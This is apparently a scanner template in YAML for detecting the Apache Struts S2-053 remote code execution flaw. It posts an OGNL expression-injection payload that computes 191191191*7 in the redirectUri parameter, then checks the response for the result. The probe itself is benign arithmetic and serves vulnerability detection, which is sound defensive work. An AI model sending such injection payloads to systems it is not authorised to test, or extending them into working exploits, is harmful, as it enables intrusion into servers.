id: struct-s2-053
info:
  name: Apache Struct S2-053 - RCE
  risk: High

requests:
  - method: POST
    redirect: true
    url: >-
      {{.BaseURL}}{{.Path}}/hello.action
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: >-
      redirectUri=%25%7B191191191*7%7D%0D%0A
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "1338338337")

reference:
  author: theblackturtle
